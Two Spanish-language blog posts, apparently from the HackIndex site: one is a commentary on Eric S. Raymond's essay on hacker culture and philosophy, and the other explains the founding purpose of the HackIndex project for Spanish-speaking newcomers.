En el articulo “How to become a Hacker”, Eric intenta dar respuesta a muchas de lasdudas mas frecuentes con respecto al Hacking, la filosofia Hacker y los Hackers en si mismos. En mi opinion, si bien nadie se haya en posesion de la verdad absoluta y menos en un fenomeno tan extendido y amplio, consigue acercarse a la mayoria de los temas con total acierto, y hace que los no Hackers tengan una vision mucho mas clara y definida de estas filosofia, y que los Hackers se vean reflejados y esbozen muy a menudo una sonrisa al observar su propia imagen.

- ¿Que es un Hacker? -

Concisa y certeramente Eric relaciona fundamentalmente a los Hackers con la “afición a lo técnico, capacidad de deleitarse en la solución de problemas y a sobrepasar los límites”. Estas caracteristicas podrian quizas parecer demasiado genericas, pero si consideramos la mentalidad Hacker como “independiente del medio particular en el que el Hacker trabaja”, observaremos que la filosofia hacker es aplicada por muchos a otras facetas de la vida alejadas de la Informatica.

Por tanto un Hacker, independientemente del medio, es una persona que controla y gusta de conocer todos los aspectos tecnicos del mismo, y que dedica la mayor parte del tiempo en resolver los problemas que encuentra, convirtiendose esto para el en un continuo reto que le proporciona nuevas vias de conocimiento y una gran satisfaccion personal. Esta continua busqueda no tiene fin, y en eso radica gran parte de su eso radica gran parte de su aliciente.

Pero lo que nos ocupa es el Hacker informatico.

La evolucion de Internet a nivel mundial a patrocinado en cierto modo la confusion en torno al termino “Hacker”. No todo aquel que se introduce en una red saltandose los sistemas de seguridad es un Hacker, al igual que no todo aquel que acude a un gimnasio es culturista profesional, de hecho, y valga el simil para quien sepa entender, la gran mayoria de los adolescentes que se apuntan a un gimnasio acaban por dejarlo a las pocas semanas. La imagen actual del Hacker en la sociedad es en gran parte negativa, debido a muchos que se autodenominan Hackers y gustan de reventar sistemas y aprovecharse de defectos tecnicos en su propio beneficio, son los denominados ‘Crackers’ y a menudo “descritos erroneamente por los medios de comunicacion como Hackers”, como muy bien indica Eric:

“La diferencia básica es esta: los hackers construyen cosas, los crackers las destruyen.”

Ademas un Hacker nunca se llamara de este modo asi mismo hasta que los demas lo hagan, o hasta que sea considerado como tal. Es simplemente una cuestion de etiquetas, y lo importante no es lo que seas sino “como” hagas las cosas.

- Filosofia Hacker -

El Hacker mira el mundo como lo haria cualquiera, pero ve cosas que otro no veria. Y mas alla, ansia conocer lo que no comprende, arreglar lo que no fque no comprende, arreglar lo que no funciona, y cambiar lo que no le gusta.

Ahora es cuando podeis entender facilmente, porque el poder teme a los Hackers tanto. Son la conciencia del sistema, y esa conciencia pone en marcha el motor que lo hace andar. Eric S. Raymond por su parte, resume el pensamiento Hacker en varios lemas fundamentales:

“1. El mundo está lleno de problemas fascinantes que esperan ser resueltos.”

Como habreis comprobado, ambos estamos de acuerdo en este punto.

Si ves las cosas de esta manera ya tienes bastante a tu favor de antemano ya que, si te sientes motivado a conseguir tu objetivo incluso antes de empezar, no tendras necesidad de motivacion adicional durante el duro trayecto que muchas veces se te presentara para su consecucion.

“2. Nadie debería tener que resolver un problema dos veces.”

Para que perder el tiempo cuando podrias estar resolviendo cualquier otro. Aqui entra necesariamente un viejo debate sobre si se debe o no compartir toda informacion con otros hackers, Eric defiende que se pueda “vender” cierta informacion siempre que no abandones tus valores como Hacker. Personalmente aspiro a otro ideal, pero es dificil abstraerse de la realidad….y por eso debemos intentar cambiarla.

“3. Lo aburrido y lo rutinario es malo.”

La repeticion ya no es un reto, aunque a veces supone mayor experiencia. En definitiva, deberiamos aceptar o no la rutina, libremente.

“4. La libertad es buena.”

Porque da cobijo a la creatividad, a la evolucion y al enriquecimiento. La libertad te garantiza centrarte en lo que de verdad te interesa.

Podrias ver aqui un cierto grado libertario o anarquista, y en verdad lo hay, pero un Hacker puede ver incluso mas alla y, citando a Eric:

“aceptar cierta clase de autoridad para poder obtener algo que valore más que el tiempo que gasta en seguir órdenes.”

Es decir, nunca hacer de nuestra filosofia nuestro mayor enemigo. Esto no es una aceptacion, es un uso. No aceptar todas regla como buena, aceptar la buena regla. Algo importante es que la informacion otorga libertad, y a su vez hace falta libertad para que la informacion abunde, no es dificil extraer la conclusion de que la desinformacion y la censura traen el autoritarismo y la esclavitud.

“5. La actitud no es sustituto para la habilidad.”

Nunca hay que olvidar que por adoptar una cierta actitud uno no se convierte automaticamente en Hacker, debes desarrollar tus habilidades. Si disfrutas con el virtusiosmo de los demas lo haras mucho mas si consigues hacerlo tu mismo, esto requiere trabajo, y el trabajo requiere motivacion…para eso es para lo que requieres de tus actitudes. Pero desconfia de los “posers”, porque confunden el fin con los medios.

Y esto es lo basico, en cuanto a la teoria que sustenta las acciones en un Hacker, espero que con la magnifica diseccion de Eric y mis subjetivos comentarios haya contribuido a un mayor entendimiento de este profuso tema.

Para los interesados en consultar el texto original de Eric, consulta mi version en Español Como convertirse en Hacker

Para finalizar este capitulo, desde mi punto de vista, lo mas valioso de esta la filosofia Hacker radica precisamente en el tipo de persona que suele sustentarla y esa es, sin duda, una persona LIBRE.

No related posts.

Related posts brought to you by Yet Another Related Posts Plugin.

El porqué de este proyecto

NBK — Fri, 15 Jun 2001 22:01:51 +0000

#####################################
## HACKINDEX ##
## http://www.hackindex.org ##
#####################################
Titulo: El porqué de este proyecto
Autor: NBK
Tema: HackIndex: El Proyecto

La información incluída en este documento es expuesta en base a un interés educativo. HackIndex no se hace responsable del uso de dicha información.

Básicamente y en mi particular visión, que creo es la de todos, se pretende ante todo contribuir al conocimiento, comprensión y desmitificación de la cultura Hacker.

Los grupos de noticias, las listas de correo y en general la red parecen haber caído en una estéril espiral en la que pocas o casi ninguna vez se crean posos que puedan ayudar a la germinación de nuevas semillas. El viejo lema de ‘Búscalo tu mismo’ carece cada vez mas de sentido en la enorme y compleja comunidad actual, repleta para mayor frustración de numerosos callejones sin salida, estaciones de tren abandonadas o en el mejor de los casos interesada desinformación.

Me planteo de que sirve todo esto si no hay garantía para la conservación de la cultura que entre todos creamos. Ni encuentro sentido a que esa preservación supongo encaminarnos al secretismo y la ostracion, frente a la que por otra parte todos a menudo nos mostramos hostiles.

Eran precisamente esas actitudes las que combatíamos.

Aun mas difícil panorama tienen los “newbies” hispanos ante una base referencial casi estrictamente anglosajona y, si bien el dominio de la lengua inglesa se hace imprescindible a cualquiera que desee progresar, creo que la comunidad hispana tiene el suficiente aval en la actualidad como para ofrecer una gama de recursos de cualquier tipo en su idioma, cualitativamente equiparables a los de la escena internacional.

Y bueno, teniendo en cuento todo esto y sin querer enrollarme mas… Aquí tenéis nuestra modesta aportación a la cultura Hacker hispana, y a la escena Underground en general. Una guía de iniciación para el estudiante y un foro de discusión y contraste para los mas veteranos.

Al fin y al cabo todas las grandes andaduras, se inician con un primer paso.

No related posts.

Related posts brought to you by Yet Another Related Posts Plugin.